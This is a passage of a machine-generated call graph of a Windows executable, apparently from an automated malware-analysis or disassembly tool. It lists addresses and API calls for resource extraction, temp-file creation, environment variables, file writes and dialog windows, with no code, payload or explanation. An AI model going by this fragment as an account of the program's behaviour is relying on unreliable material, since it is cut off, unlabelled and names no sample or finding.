8522 4035a0 8521->8522 8523 405060 2 API calls 8522->8523 8524 4035ac 8523->8524 8525 4035b7 8524->8525 8526 4035db 8524->8526 9389 40de80 GetLastError TlsGetValue SetLastError 8525->9389 8527 4035e5 8526->8527 8528 403608 8526->8528 9391 40de80 GetLastError TlsGetValue SetLastError 8527->9391 8531 403612 8528->8531 8532 40363b 8528->8532 9392 40de80 GetLastError TlsGetValue SetLastError 8531->9392 8535 403645 8532->8535 8536 40366e 8532->8536 8533 4035bd 9390 40de80 GetLastError TlsGetValue SetLastError 8533->9390 8534 4035f1 8541 40e020 4 API calls 8534->8541 9410 40de80 GetLastError TlsGetValue SetLastError 8535->9410 8539 4036a1 8536->8539 8540 403678 8536->8540 8548 4036d4 8539->8548 8549 4036ab 8539->8549 9412 40de80 GetLastError TlsGetValue SetLastError 8540->9412 8546 4035f9 8541->8546 8543 403618 9393 40de80 GetLastError TlsGetValue SetLastError 8543->9393 8544 4035c5 8551 40a7f5 5 API calls 8544->8551 8557 40dec0 3 API calls 8546->8557 8547 40364b 9411 40de80 GetLastError TlsGetValue SetLastError 8547->9411 8555 403707 8548->8555 8556 4036de 8548->8556 9414 40de80 GetLastError TlsGetValue SetLastError 8549->9414 8553 4035cc 8551->8553 8552 403620 9394 40a83a 8552->9394 8561 40dec0 3 API calls 8553->8561 8554 40367e 9413 40de80 GetLastError TlsGetValue SetLastError 8554->9413 8567 403711 8555->8567 8568 40373a 8555->8568 9416 40de80 GetLastError TlsGetValue SetLastError 8556->9416 8564 4035d6 8557->8564 8561->8564 9387 40de80 GetLastError TlsGetValue SetLastError 8564->9387 8565 403653 8574 40a83a 17 API calls 8565->8574 8566 4036b1 9415 40de80 GetLastError TlsGetValue SetLastError 8566->9415 9418 40de80 GetLastError TlsGetValue SetLastError 8567->9418 8572 403744 8568->8572 8573 40376d 8568->8573 8570 403686 8581 40a83a 17 API calls 8570->8581 8571 4036e4 9417 40de80 GetLastError TlsGetValue SetLastError 8571->9417 9420 40de80 GetLastError TlsGetValue SetLastError 8572->9420 8578 403777 8573->8578 8579 40379d 8573->8579 8585 40365f 8574->8585 8577 403717 9419 40de80 GetLastError TlsGetValue SetLastError 8577->9419 9422 40de80 GetLastError TlsGetValue SetLastError 8578->9422 8593 4037f5 8579->8593 8594 4037a7 8579->8594 8580 40dec0 3 API calls 8645 403636 8580->8645 8589 403692 8581->8589 8595 40dec0 3 API calls 8585->8595 8586 4036b9 8596 40a83a 17 API calls 8586->8596 8600 40dec0 3 API calls 8589->8600 8590 40381f 8601 40e020 4 API calls 8590->8601 8591 4036ec 8602 40a83a 17 API calls 8591->8602 8592 40374a 9421 40de80 GetLastError TlsGetValue SetLastError 8592->9421 9452 40de80 GetLastError TlsGetValue SetLastError 8593->9452 9424 40de80 GetLastError TlsGetValue SetLastError 8594->9424 8595->8645 8597 4036c5 8596->8597 8606 40dec0 3 API calls 8597->8606 8598 40371f 8607 40a83a 17 API calls 8598->8607 8599 40377d 9423 40de80 GetLastError TlsGetValue SetLastError 8599->9423 8600->8645 8609 403827 8601->8609 8610 4036f8 8602->8610 8606->8645 8615 40372b 8607->8615 9388 405170 TlsGetValue 8609->9388 8618 40dec0 3 API calls 8610->8618 8611 403752 8619 40a83a 17 API calls 8611->8619 8612 4037ad 9425 40de80 GetLastError TlsGetValue SetLastError 8612->9425 8613 4037fb 9453 40de80 GetLastError TlsGetValue SetLastError 8613->9453 8623 40dec0 3 API calls 8615->8623 8616 403785 8624 40a83a 17 API calls 8616->8624 8618->8645 8626 40375e 8619->8626 8621 4037b5 9426 409355 8621->9426 8622 403803 8628 40a7f5 5 API calls 8622->8628 8623->8645 8629 403791 8624->8629 8625 40382e 8631 40df50 HeapFree 8625->8631 8630 40dec0 3 API calls 8626->8630 8633 40380a 8628->8633 8634 40dec0 3 API calls 8629->8634 8630->8645 8635 403846 8631->8635 8637 40dec0 3 API calls 8633->8637 8634->8645 8638 40df50 HeapFree 8635->8638 8636 40dec0 3 API calls 8639 4037d0 8636->8639 8637->8564 8640 40384e 8638->8640 8641 4037e9 8639->8641 8642 4037dd 8639->8642 8640->7678 8644 401fa9 36 API calls 8641->8644 9449 405532 8642->9449 8644->8645 8645->8564 8646->7682 8647->7684 8649 40dfc0 21 API calls 8648->8649 8650 402c04 8649->8650 8651 4051a0 3 API calls 8650->8651 8652 402c0d 8651->8652 8653 405060 2 API calls 8652->8653 8654 402c19 8653->8654 8655 409ba0 RtlAllocateHeap 8654->8655 8656 402c23 GetShortPathNameW 8655->8656 9462 40de80 GetLastError TlsGetValue SetLastError 8656->9462 8658 402c3f 9463 40de80 GetLastError TlsGetValue SetLastError 8658->9463 8660 402c47 8661 409c10 5 API calls 8660->8661 8662 402c57 8661->8662 8663 40dec0 3 API calls 8662->8663 8664 402c61 8663->8664 9464 409b80 HeapFree 8664->9464 8666 402c6a 9465 40de80 GetLastError TlsGetValue SetLastError 8666->9465 8668 402c74 8669 40e020 4 API calls 8668->8669 8670 402c7c 8669->8670 9466 405170 TlsGetValue 8670->9466 8672 402c83 8673 40df50 HeapFree 8672->8673 8674 402c9a 8673->8674 8675 40df50 HeapFree 8674->8675 8676 402ca3 8675->8676 8677 40e080 TlsGetValue 8676->8677 8677->7688 8678->7690 8680 404434 8679->8680 8682 4098c7 SetEnvironmentVariableW 8679->8682 8680->7693 8682->8680 8683->7696 8684->7704 8686 40dfc0 21 API calls 8685->8686 8687 401e5f 8686->8687 8688 4051a0 3 API calls 8687->8688 8689 401e68 8688->8689 9467 40de80 GetLastError TlsGetValue SetLastError 8689->9467 8691 401e6e 9468 40de80 GetLastError TlsGetValue SetLastError 8691->9468 8693 401e76 8694 409698 7 API calls 8693->8694 8695 401e7d 8694->8695 8696 40dec0 3 API calls 8695->8696 8697 401e87 PathQuoteSpacesW 8696->8697 8698 401ee0 8697->8698 8699 401e97 8697->8699 9537 40de80 GetLastError TlsGetValue SetLastError 8698->9537 9471 40de80 GetLastError TlsGetValue SetLastError 8699->9471 8702 401e9d 9472 4024f1 8702->9472 8703 401ee9 8705 40e020 4 API calls 8703->8705 8707 401ef1 8705->8707 8709 40dec0 3 API calls 8707->8709 8708 40dec0 3 API calls 8710 401eae 8708->8710 8711 401ede 8709->8711 9536 40de80 GetLastError TlsGetValue SetLastError 8710->9536 9469 40de80 GetLastError TlsGetValue SetLastError 8711->9469 8714 401eb7 8716 40e020 4 API calls 8714->8716 8715 401f05 8717 40e020 4 API calls 8715->8717 8718 401ebf 8716->8718 8719 401f0d 8717->8719 8720 40e020 4 API calls 8718->8720 9470 405170 TlsGetValue 8719->9470 8722 401eca 8720->8722 8724 40e020 4 API calls 8722->8724 8723 401f14 8726 40df50 HeapFree 8723->8726 8725 401ed4 8724->8725 8727 40dec0 3 API calls 8725->8727 8728 401f2b 8726->8728 8727->8711 8729 40df50 HeapFree 8728->8729 8730 401f34 8729->8730 8730->7707 8732 40385b 8731->8732 8732->8732 8733 40dfc0 21 API calls 8732->8733 8751 40386d 8733->8751 8734 4038ee 9568 40de80 GetLastError TlsGetValue SetLastError 8734->9568 8736 4038f4 9569 40de80 GetLastError TlsGetValue SetLastError 8736->9569 8738 4038fc 9570 40de80 GetLastError TlsGetValue SetLastError 8738->9570 8739 405dc0 3 API calls 8739->8751 8741 403904 9571 40de80 GetLastError TlsGetValue SetLastError 8741->9571 8743 40390c 8745 40d100 8 API calls 8743->8745 8744 40de80 GetLastError TlsGetValue SetLastError 8744->8751 8746 40391e 8745->8746 9572 405182 TlsGetValue 8746->9572 8747 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8747->8751 8749 403923 8750 405eb0 6 API calls 8749->8750 8752 40392b 8750->8752 8751->8734 8751->8739 8751->8744 8751->8747 8753 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8751->8753 8754 40dec0 3 API calls 8752->8754 8753->8751 8755 403935 8754->8755 9573 40de80 GetLastError TlsGetValue SetLastError 8755->9573 8757 40393b 9574 40de80 GetLastError TlsGetValue SetLastError 8757->9574 8759 403943 9575 40de80 GetLastError TlsGetValue SetLastError 8759->9575 8761 40394b 9576 40de80 GetLastError TlsGetValue SetLastError 8761->9576 8763 403953 8764 40d100 8 API calls 8763->8764 8765 403965 8764->8765 9577 405182 TlsGetValue 8765->9577 8767 40396a 8768 405eb0 6 API calls 8767->8768 8769 403972 8768->8769 8770 40dec0 3 API calls 8769->8770 8771 40397c 8770->8771 9578 40de80 GetLastError TlsGetValue SetLastError 8771->9578 8773 403982 9579 40de80 GetLastError TlsGetValue SetLastError 8773->9579 8775 40398a 9580 40de80 GetLastError TlsGetValue SetLastError 8775->9580 8777 403992 9581 40de80 GetLastError TlsGetValue SetLastError 8777->9581 8779 40399a 8780 40d100 8 API calls 8779->8780 8781 4039aa 8780->8781 9582 405182 TlsGetValue 8781->9582 8783 4039af 8784 405eb0 6 API calls 8783->8784 8785 4039b7 8784->8785 8786 40dec0 3 API calls 8785->8786 8787 4039c1 8786->8787 9583 40de80 GetLastError TlsGetValue SetLastError 8787->9583 8789 4039c7 9584 40de80 GetLastError TlsGetValue SetLastError 8789->9584 8791 4039cf 9585 40de80 GetLastError TlsGetValue SetLastError 8791->9585 8793 4039d7 9586 40de80 GetLastError TlsGetValue SetLastError 8793->9586 8795 4039df 8796 40d100 8 API calls 8795->8796 8797 4039ef 8796->8797 9587 405182 TlsGetValue 8797->9587 8799 4039f4 8800 405eb0 6 API calls 8799->8800 8801 4039fc 8800->8801 8802 40dec0 3 API calls 8801->8802 8803 403a06 8802->8803 9588 40de80 GetLastError TlsGetValue SetLastError 8803->9588 8805 403a0c 9589 40de80 GetLastError TlsGetValue SetLastError 8805->9589 8807 403a14 9590 40de80 GetLastError TlsGetValue SetLastError 8807->9590 8809 403a1c 9591 40de80 GetLastError TlsGetValue SetLastError 8809->9591 8811 403a24 8812 40d100 8 API calls 8811->8812 8813 403a34 8812->8813 9592 405182 TlsGetValue 8813->9592 8815 403a39 8816 405eb0 6 API calls 8815->8816 8817 403a41 8816->8817 8818 40dec0 3 API calls 8817->8818 8819 403a4b 8818->8819 9593 40de80 GetLastError TlsGetValue SetLastError 8819->9593 8821 403a51 9594 403cd7 8821->9594 8824 4051a0 3 API calls 8825 403a66 8824->8825 9635 40de80 GetLastError TlsGetValue SetLastError 8825->9635 8827 403a6c 8828 403cd7 84 API calls 8827->8828 8829 403a7c 8828->8829 8830 40dec0 3 API calls 8829->8830 8831 403a88 8830->8831 9636 40de80 GetLastError TlsGetValue SetLastError 8831->9636 8833 403a8e 8834 403cd7 84 API calls 8833->8834 8835 403a9e 8834->8835 8836 40dec0 3 API calls 8835->8836 8837 403aa8 8836->8837 9637 40de80 GetLastError TlsGetValue SetLastError 8837->9637 8839 403aae 8840 403cd7 84 API calls 8839->8840 8841 403abe 8840->8841 8842 40dec0 3 API calls 8841->8842 8843 403ac8 8842->8843 9638 40de80 GetLastError TlsGetValue SetLastError 8843->9638 8845 403ace 8846 403cd7 84 API calls 8845->8846 8847 403ade 8846->8847 8848 40dec0 3 API calls 8847->8848 8849 403ae8 8848->8849 9639 40de80 GetLastError TlsGetValue SetLastError 8849->9639 8851 403aee 9640 40de80 GetLastError TlsGetValue SetLastError 8851->9640 8853 403af6 9641 40de80 GetLastError TlsGetValue SetLastError 8853->9641 8855 403afe 8856 402bfa 43 API calls 8855->8856 8857 403b0b 8856->8857 9642 40e080 TlsGetValue 8857->9642 8859 403b10 9643 405182 TlsGetValue 8859->9643 8861 403b1f 9644 406650 8861->9644 8864 40dec0 3 API calls 8865 403b32 8864->8865 9647 40de80 GetLastError TlsGetValue SetLastError 8865->9647 8867 403b38 9648 40de80 GetLastError TlsGetValue SetLastError 8867->9648 8869 403b40 9649 40de80 GetLastError TlsGetValue SetLastError 8869->9649 8871 403b48 8872 402bfa 43 API calls 8871->8872 8873 403b55 8872->8873 9650 40e080 TlsGetValue 8873->9650 8875 403b5a 9651 405182 TlsGetValue 8875->9651 8877 403b69 8878 406650 13 API calls 8877->8878 8879 403b72 8878->8879 8880 40dec0 3 API calls 8879->8880 8881 403b7c 8880->8881 9652 40de80 GetLastError TlsGetValue SetLastError 8881->9652 8883 403b82 9653 40de80 GetLastError TlsGetValue SetLastError 8883->9653 8885 403b8e 8886 40e020 4 API calls 8885->8886 8887 403b96 8886->8887 8888 40e020 4 API calls 8887->8888 8889 403ba1 8888->8889 8890 40e020 4 API calls 8889->8890 8891 403bab 8890->8891 8892 40e020 4 API calls 8891->8892 8893 403bb5 8892->8893 8894 40e020 4 API calls 8893->8894 8895 403bbf 8894->8895 9654 40e080 TlsGetValue 8895->9654 8897 403bc4 9655 405182 TlsGetValue 8897->9655 8899 403bcf 9656 40240c 8899->9656 8902 4051a0 3 API calls 8903 403bdd 8902->8903 8904 40df50 HeapFree 8903->8904 8905 403be8 8904->8905 8906 40df50 HeapFree 8905->8906 8907 403bf1 8906->8907 8908 40df50 HeapFree 8907->8908 8909 403bfa 8908->8909 8910 40df50 HeapFree 8909->8910 8911 403c03 8910->8911 8912 40df50 HeapFree 8911->8912 8913 403c0c 8912->8913 8914 40df50 HeapFree 8913->8914 8915 403c15 8914->8915 8916 40df50 HeapFree 8915->8916 8917 403c1e 8916->8917 8918 40df50 HeapFree 8917->8918 8919 403c27 8918->8919 8920 40df50 HeapFree 8919->8920 8921 403c30 8920->8921 8922 40df50 HeapFree 8921->8922 8923 403c39 8922->8923 8924 40de80 GetLastError TlsGetValue SetLastError 8923->8924 8924->7712 8925->7718 8926->7734 8979 4054b7 EnterCriticalSection 8978->8979 8980 404502 8978->8980 8985 4054cd 8979->8985 8987 4054fd 8979->8987 8980->7731 8981 40db72 HeapAlloc 8983 405517 LeaveCriticalSection 8981->8983 8982 4054ce WaitForSingleObject 8984 4054de CloseHandle 8982->8984 8982->8985 8983->8980 8985->8982 8985->8987 8987->8981 8989 40dfc0 21 API calls 8988->8989 8990 402cb7 8989->8990 8991 405060 2 API calls 8990->8991 8993 402cc3 8991->8993 9103 40e0e0 9053->9103 9057 402bc7 9056->9057 9057->9057 9058 40dfc0 21 API calls 9057->9058 9059 402bd9 GetNativeSystemInfo 9058->9059 9060 402bec 9059->9060 9060->8203 9060->8204 9061->8230 9062->8237 9064 4055c8 9063->9064 9068 4032bd 9063->9068 9064->9068 9109 405553 memset GetModuleHandleW 9064->9109 9067 405606 GetVersionExW 9067->9068 9068->8204 9069->8212 9070->8216 9072 40e260 3 API calls 9071->9072 9073 4032ef 9072->9073 9073->8222 9074->8227 9075->8243 9076->8258 9112 40d498 EnterCriticalSection 9077->9112 9079 40add5 9080 40ae6e 9079->9080 9081 40addf CreateFileW 9079->9081 9080->8269 9082 40ae00 9081->9082 9083 40ae20 9081->9083 9082->9083 9085 40ae0d HeapAlloc 9082->9085 9086 40ae65 9083->9086 9122 40d40a EnterCriticalSection 9083->9122 9085->9083 9086->8269 9088 40a9e9 9087->9088 9089 40a9da 9087->9089 9133 40d459 EnterCriticalSection 9088->9133 9137 40d9f5 9089->9137 9094 40aa2d 9094->8270 9095 40aa19 FindCloseChangeNotification 9097 40d40a 4 API calls 9095->9097 9097->9094 9098 40aa08 HeapFree 9098->9095 9099->8277 9100->8279 9101->8211 9102->8215 9104 4032a2 9103->9104 9105 40e0ea wcslen HeapAlloc 9103->9105 9104->8199 9107 40e3a0 9105->9107 9108 40e3b0 9107->9108 9108->9104 9110 40558b 9109->9110 9111 40557b GetProcAddress 9109->9111 9110->9067 9110->9068 9111->9110 9113 40d4b2 9112->9113 9114 40d4c7 9112->9114 9115 40db72 HeapAlloc 9113->9115 9116 40d4ec 9114->9116 9117 40d4cc HeapReAlloc 9114->9117 9118 40d4c1 9115->9118 9119 40d501 HeapAlloc 9116->9119 9120 40d4f5 9116->9120 9117->9116 9121 40d51d LeaveCriticalSection 9118->9121 9119->9120 9120->9121 9121->9079 9123 40d441 9122->9123 9124 40d422 9122->9124 9130 40db32 9123->9130 9124->9123 9126 40d427 9124->9126 9127 40d430 memset 9126->9127 9128 40d44d LeaveCriticalSection 9126->9128 9127->9128 9128->9086 9129 40d44b 9129->9128 9131 40db43 HeapFree 9130->9131 9131->9129 9134 40d472 9133->9134 9135 40d47d LeaveCriticalSection 9133->9135 9134->9135 9136 40a9f6 9135->9136 9136->9094 9136->9095 9143 40aa40 9136->9143 9138 40da02 9137->9138 9139 40a9e5 9137->9139 9146 40db1b EnterCriticalSection 9138->9146 9139->8270 9142 40da08 9142->9139 9147 40dac4 9142->9147 9144 40aa54 WriteFile 9143->9144 9145 40aa7c 9143->9145 9144->9098 9145->9098 9146->9142 9149 40dad0 9147->9149 9148 40db14 9148->9142 9149->9148 9150 40db0a LeaveCriticalSection 9149->9150 9150->9148 9152 409ba8 RtlAllocateHeap 9151->9152 9153 409bba 9151->9153 9152->8303 9153->8303 9168 40e7e0 9154->9168 9156 402f24 9156->8308 9158 40dfc0 21 API calls 9157->9158 9159 4026c1 LoadResource SizeofResource 9158->9159 9160 409ba0 RtlAllocateHeap 9159->9160 9161 4026ee 9160->9161 9187 409c80 memcpy 9161->9187 9163 402705 FreeResource 9164 402715 9163->9164 9165 4046ef 9164->9165 9188 409b60 9165->9188 9167 4046f8 9167->8306 9169 40e7f8 __fprintf_l 9168->9169 9171 40e8aa __fprintf_l 9169->9171 9172 40e950 9169->9172 9171->9156 9173 40f3b2 9172->9173 9177 40e960 __fprintf_l 9172->9177 9173->9169 9174 40ef37 9178 40efa4 __fprintf_l 9174->9178 9179 4104f0 9174->9179 9176 40ee4f memcpy 9176->9177 9177->9173 9177->9174 9177->9176 9178->9169 9180 410504 9179->9180 9181 410572 memcpy 9180->9181 9182 41054c memcpy 9180->9182 9184 41051f 9180->9184 9185 410599 memcpy 9181->9185 9186 4105b8 9181->9186 9182->9178 9184->9178 9185->9178 9186->9178 9187->9163 9189 409b68 HeapSize 9188->9189 9190 409b7a 9188->9190 9189->9167 9190->9167 9191->8321 9192->8329 9193->8320 9194->8324 9195->8328 9196->8332 9198 409c29 9197->9198 9199 409c19 9197->9199 9200 40e260 3 API calls 9198->9200 9299 409bc0 9199->9299 9203 409c3f 9200->9203 9305 40e3f0 TlsGetValue 9203->9305 9205 409c68 9205->8336 9206->8340 9306 405f90 9207->9306 9209 402211 9209->8345 9210->8349 9211->8351 9212->8353 9213->8355 9214->8359 9215->8365 9216->8367 9217->8369 9218->8371 9220 40590f 9219->9220 9227 405801 9219->9227 9316 40e340 TlsGetValue 9220->9316 9222 405918 9222->8373 9223 405886 9225 40e1e0 TlsGetValue 9223->9225 9224 405850 wcsncmp 9224->9227 9226 4058c7 9225->9226 9228 4058e9 9226->9228 9315 40e230 TlsGetValue 9226->9315 9227->9223 9227->9224 9229 40e260 3 API calls 9228->9229 9231 4058f0 9229->9231 9233 405901 9231->9233 9234 4058f6 wcsncpy 9231->9234 9232 4058d7 memmove 9232->9228 9233->8373 9234->9233 9235->8375 9236->8377 9237->8379 9238->8383 9239->8385 9317 408e58 9240->9317 9242 408f81 9243 408e58 3 API calls 9242->9243 9244 408f90 9243->9244 9245 408e58 3 API calls 9244->9245 9246 408fa3 9245->9246 9247 408fb0 GetStockObject 9246->9247 9248 408fbd LoadIconW LoadCursorW RegisterClassExW 9246->9248 9247->9248 9321 4094d1 GetForegroundWindow 9248->9321 9253 409047 IsWindowEnabled 9254 40906b 9253->9254 9255 409052 EnableWindow 9253->9255 9256 4094d1 3 API calls 9254->9256 9255->9254 9257 40907e GetSystemMetrics GetSystemMetrics CreateWindowExW 9256->9257 9258 4092ba 9257->9258 9259 4090cb SetWindowLongW CreateWindowExW SendMessageW 9257->9259 9260 4092cd 9258->9260 9335 40e340 TlsGetValue 9258->9335 9261 409125 9259->9261 9262 409128 CreateWindowExW SendMessageW SetFocus 9259->9262 9336 408e9a 9260->9336 9261->9262 9264 4091a5 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 9262->9264 9265 40917b SendMessageW wcslen wcslen SendMessageW 9262->9265 9268 40926a 9264->9268 9265->9264 9270 409273 9268->9270 9271 40922e GetMessageW 9268->9271 9269 408e9a HeapFree 9272 4092df 9269->9272 9274 409277 DestroyAcceleratorTable 9270->9274 9275 40927e 9270->9275 9271->9270 9273 409243 TranslateAcceleratorW 9271->9273 9276 408e9a HeapFree 9272->9276 9273->9268 9277 409254 TranslateMessage DispatchMessageW 9273->9277 9274->9275 9275->9258 9278 409285 wcslen 9275->9278 9279 4022e5 9276->9279 9277->9268 9280 40e260 3 API calls 9278->9280 9279->8388 9281 40929c wcscpy HeapFree 9280->9281 9281->9258 9282->8394 9283->8396 9284->8398 9285->8400 9286->8404 9287->8411 9288->8413 9289->8415 9290->8419 9291->8421 9293 4094d1 3 API calls 9292->9293 9294 408e2d 9293->9294 9295 409588 16 API calls 9294->9295 9296 408e36 MessageBoxW 9295->9296 9297 409588 16 API calls 9296->9297 9298 40239f 9297->9298 9298->8424 9300 409bcd 9299->9300 9301 40e260 3 API calls 9300->9301 9302 409beb 9301->9302 9303 409bf1 memcpy 9302->9303 9304 409bff 9302->9304 9303->9304 9304->8336 9305->9205 9309 405fa1 9306->9309 9307 40e1e0 TlsGetValue 9308 406014 9307->9308 9310 40e260 3 API calls 9308->9310 9309->9307 9309->9309 9311 406022 9310->9311 9313 406032 9311->9313 9314 40e370 TlsGetValue 9311->9314 9313->9209 9314->9313 9315->9232 9316->9222 9318 408e60 wcslen HeapAlloc 9317->9318 9319 408e96 9317->9319 9318->9319 9320 408e86 wcscpy 9318->9320 9319->9242 9320->9242 9322 409032 9321->9322 9323 4094e2 GetWindowThreadProcessId GetCurrentProcessId 9321->9323 9324 409588 9322->9324 9323->9322 9325 409592 EnumWindows 9324->9325 9330 4095dd 9324->9330 9326 40903e 9325->9326 9327 4095af 9325->9327 9339 409507 GetWindowThreadProcessId GetCurrentThreadId 9325->9339 9326->9253 9326->9254 9327->9326 9329 4095b1 GetCurrentThreadId 9327->9329 9332 4095c4 SetWindowPos 9327->9332 9328 4095ea GetCurrentThreadId 9328->9330 9329->9327 9330->9326 9330->9328 9331 409600 EnableWindow 9330->9331 9333 409611 SetWindowPos 9330->9333 9334 40db32 HeapFree 9330->9334 9331->9330 9332->9327 9333->9330 9334->9330 9335->9260 9337 408ea1 HeapFree 9336->9337 9338 408eb3 9336->9338 9337->9338 9338->9269 9340 409525 IsWindowVisible 9339->9340 9341 40957f 9339->9341 9340->9341 9342 409530 9340->9342 9343 40db72 HeapAlloc 9342->9343 9344 40953c GetCurrentThreadId GetWindowLongW 9343->9344 9345 40955a 9344->9345 9346 40955e GetForegroundWindow 9344->9346 9345->9346 9346->9341 9347 409568 IsWindowEnabled 9346->9347 9347->9341 9348 409573 EnableWindow 9347->9348 9348->9341 9349->8435 9350->8438 9352 40e260 3 API calls 9351->9352 9353 40a769 GetTempPathW LoadLibraryW 9352->9353 9354 40a7a4 9353->9354 9355 40a786 GetProcAddress 9353->9355 9377 40e3f0 TlsGetValue 9354->9377 9356 40a796 GetLongPathNameW 9355->9356 9357 40a79d FreeLibrary 9355->9357 9356->9357 9357->9354 9359 401a0d 9359->8441 9360->8445 9361->8447 9378 40a7b9 9362->9378 9365 40a6c5 9366 40a6d4 wcsncpy wcslen 9365->9366 9367 401a6a GetTempFileNameW 9365->9367 9368 40a708 CreateDirectoryW 9366->9368 9370 40de80 GetLastError TlsGetValue SetLastError 9367->9370 9368->9367 9370->8458 9371->8460 9372->8470 9373->8472 9374->8480 9375->8482 9376->8488 9377->9359 9379 40a7c0 9378->9379 9380 401a5f 9378->9380 9381 40a7d6 DeleteFileW 9379->9381 9382 40a7c7 SetFileAttributesW 9379->9382 9380->9365 9381->9380 9382->9381 9383->8501 9385 40a961 SetCurrentDirectoryW 9384->9385 9386 4046cb 9384->9386 9385->9386 9386->8509 9387->8590 9388->8625 9389->8533 9390->8544 9391->8534 9392->8543 9393->8552 9395 40e260 3 API calls 9394->9395 9396 40a84f 9395->9396 9397 40a85e LoadLibraryW 9396->9397 9403 40a8e9 9396->9403 9398 40a8cb 9397->9398 9399 40a86f GetProcAddress 9397->9399 9454 40a96c SHGetFolderLocation 9398->9454 9400 40a8c0 FreeLibrary 9399->9400 9407 40a884 9399->9407 9400->9398 9408 40a91b 9400->9408 9404 40a96c 4 API calls 9403->9404 9403->9408 9404->9408 9405 40362c 9405->8580 9407->9400 9409 40a896 wcscpy wcscat wcslen CoTaskMemFree 9407->9409 9460 40e3f0 TlsGetValue 9408->9460 9409->9400 9410->8547 9411->8565 9412->8554 9413->8570 9414->8566 9415->8586 9416->8571 9417->8591 9418->8577 9419->8598 9420->8592 9421->8611 9422->8599 9423->8616 9424->8612 9425->8621 9427 409368 CoInitialize 9426->9427 9428 409379 memset LoadLibraryW 9426->9428 9427->9428 9429 4093a3 GetProcAddress GetProcAddress 9428->9429 9430 4094ab 9428->9430 9431 4093d2 wcsncpy wcslen 9429->9431 9432 4093cd 9429->9432 9433 40e260 3 API calls 9430->9433 9434 409401 9431->9434 9432->9431 9435 4094b8 9433->9435 9436 4094d1 3 API calls 9434->9436 9461 40e3f0 TlsGetValue 9435->9461 9437 40941f 9436->9437 9439 409588 16 API calls 9437->9439 9441 409442 9439->9441 9440 4037c6 9440->8636 9442 409588 16 API calls 9441->9442 9443 409457 9442->9443 9444 40949f FreeLibrary 9443->9444 9445 40e260 3 API calls 9443->9445 9444->9430 9444->9435 9446 409468 CoTaskMemFree wcslen 9445->9446 9446->9444 9448 409493 9446->9448 9448->9444 9450 40553b timeBeginPeriod 9449->9450 9451 40554d Sleep 9449->9451 9450->9451 9452->8613 9453->8622 9455 40a98b SHGetPathFromIDListW 9454->9455 9456 40a8d3 wcscat wcslen 9454->9456 9457 40a9b5 CoTaskMemFree 9455->9457 9458 40a999 wcslen 9455->9458 9456->9408 9457->9456 9458->9457 9459 40a9a6 9458->9459 9459->9457 9460->9405 9461->9440 9462->8658 9463->8660 9464->8666 9465->8668 9466->8672 9467->8691 9468->8693 9469->8715 9470->8723 9471->8702 9473 4024f7 9472->9473 9473->9473 9474 40dfc0 21 API calls 9473->9474 9475 402509 9474->9475 9476 4051a0 3 API calls 9475->9476 9495 402512 9476->9495 9477 402593 9538 40de80 GetLastError TlsGetValue SetLastError 9477->9538 9479 402599 9539 40de80 GetLastError TlsGetValue SetLastError 9479->9539 9481 4025a1 GetCommandLineW 9483 409bc0 4 API calls 9481->9483 9482 405dc0 3 API calls 9482->9495 9484 4025ae 9483->9484 9486 40dec0 3 API calls 9484->9486 9485 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 9485->9495 9487 4025b8 9486->9487 9540 40de80 GetLastError TlsGetValue SetLastError 9487->9540 9488 40de80 GetLastError TlsGetValue SetLastError 9488->9495 9490 4025c2 9491 40e020 4 API calls 9490->9491 9492 4025ca 9491->9492 9493 40dec0 3 API calls 9492->9493 9496 4025d4 PathRemoveArgsW 9493->9496 9494 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 9494->9495 9495->9477 9495->9482 9495->9485 9495->9488 9495->9494 9497 4025eb 9496->9497 9498 402651 9497->9498 9541 40de80 GetLastError TlsGetValue SetLastError 9497->9541 9500 4098c0 SetEnvironmentVariableW 9498->9500 9502 40265e 9500->9502 9501 4025fd 9503 40e020 4 API calls 9501->9503 9554 40de80 GetLastError TlsGetValue SetLastError 9502->9554 9505 40260a 9503->9505 9542 40de80 GetLastError TlsGetValue SetLastError 9505->9542 9506 402668 9508 40e020 4 API calls 9506->9508 9510 402670 9508->9510 9509 402610 9543 40de80 GetLastError TlsGetValue SetLastError 9509->9543 9555 405170 TlsGetValue 9510->9555 9513 402677 9516 40df50 HeapFree 9513->9516 9514 402618 9544 40de80 GetLastError TlsGetValue SetLastError 9514->9544 9518 40268f 9516->9518 9517 402620 9545 40de80 GetLastError TlsGetValue SetLastError 9517->9545 9521 40df50 HeapFree 9518->9521 9520 402628 9546 406110 9520->9546 9523 402698 9521->9523 9525 40df50 HeapFree 9523->9525 9524 402639 9553 405182 TlsGetValue 9524->9553 9527 4026a1 9525->9527 9529 40df50 HeapFree 9527->9529 9528 40263e 9530 406060 5 API calls 9528->9530 9531 4026aa 9529->9531 9532 402646 9530->9532 9533 40df50 HeapFree 9531->9533 9534 40dec0 3 API calls 9532->9534 9535 401ea4 9533->9535 9534->9498 9535->8708 9536->8714 9537->8703 9538->9479 9539->9481 9540->9490 9541->9501 9542->9509 9543->9514 9544->9517 9545->9520 9547 406146 9546->9547 9549 406118 9546->9549 9565 40e340 TlsGetValue 9547->9565 9549->9549 9556 406080 9549->9556 9550 40614f 9550->9524 9553->9528 9554->9506 9555->9513 9557 40e1e0 TlsGetValue 9556->9557 9558 40609c 9557->9558 9559 40e260 3 API calls 9558->9559 9560 4060a8 9559->9560 9561 4060b4 9560->9561 9566 40e370 TlsGetValue 9560->9566 9567 40e3f0 TlsGetValue 9561->9567 9564 4060fd 9564->9524 9565->9550 9566->9561 9567->9564 9568->8736 9569->8738 9570->8741 9571->8743 9572->8749 9573->8757 9574->8759 9575->8761 9576->8763 9577->8767 9578->8773 9579->8775 9580->8777 9581->8779 9582->8783 9583->8789 9584->8791 9585->8793 9586->8795 9587->8799 9588->8805 9589->8807 9590->8809 9591->8811 9592->8815 9593->8821 9595 40dfc0 21 API calls 9594->9595 9596 403ce3 9595->9596 9597 4051a0 3 API calls 9596->9597 9598 403cec 9597->9598 9599 405060 2 API calls 9598->9599 9600 403cf8 FindResourceW 9599->9600 9601 403db3 9600->9601 9602 403d1b 9600->9602 9724 40de80 GetLastError TlsGetValue SetLastError 9601->9724 9603 4026b8 26 API calls 9602->9603 9605 403d2a 9603->9605 9607 4046ef HeapSize 9605->9607 9606 403dbd 9608 40e020 